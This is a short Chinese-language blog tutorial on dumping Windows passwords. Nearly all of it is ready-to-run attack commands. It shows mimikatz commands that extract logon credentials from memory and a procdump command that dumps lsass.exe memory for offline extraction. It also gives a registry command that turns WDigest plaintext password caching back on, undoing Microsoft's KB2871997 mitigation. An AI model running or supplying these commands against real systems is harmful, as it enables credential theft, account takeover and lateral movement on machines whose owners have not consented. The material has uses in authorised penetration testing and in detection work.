把Windows密码dump下来

00 前言

把Windows密码dump下来, 使用以下工具:
mimikatz
pwdump7

01 使用方法

win7/10好说, 直接dump或者使用mimikatz即可

参考链接

02 本地dump

运行mimikatz, 管理员权限, 执行以下命令即可

1
2
privilege::debug
sekurlsa::logonpasswords

03 离线dump

渗透的时候用procdump, 如果有机会弄到lsass.exe, 右键创建存储文件即可
转存文件
使用procdump命令:
xxx\procdump.exe -accepteula -ma lsass.exe xxx\lsass.dmp
然后把dmp文件下载下来本地跑mimikatz即可

命令如下:

1
2
sekurlsa::minidump xxx\Desktop\lsass.dmp
sekurlsa::tspkg

04 失效解决方法

微软打了补丁kb2871997,通过禁用Wdigest Auth来强制系统内存不保存明文口令
参考链接

使用命令修改注册表:
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

然后注销或者重启即可

以下为正常注册表, 没有UseLogonCredential
正常注册表

05 下载地址

ProcDump
mimikatz
还有一个pwdump7, 下载地址不是官方, 就不给出来了


-------------本文结束  感谢您的阅读-------------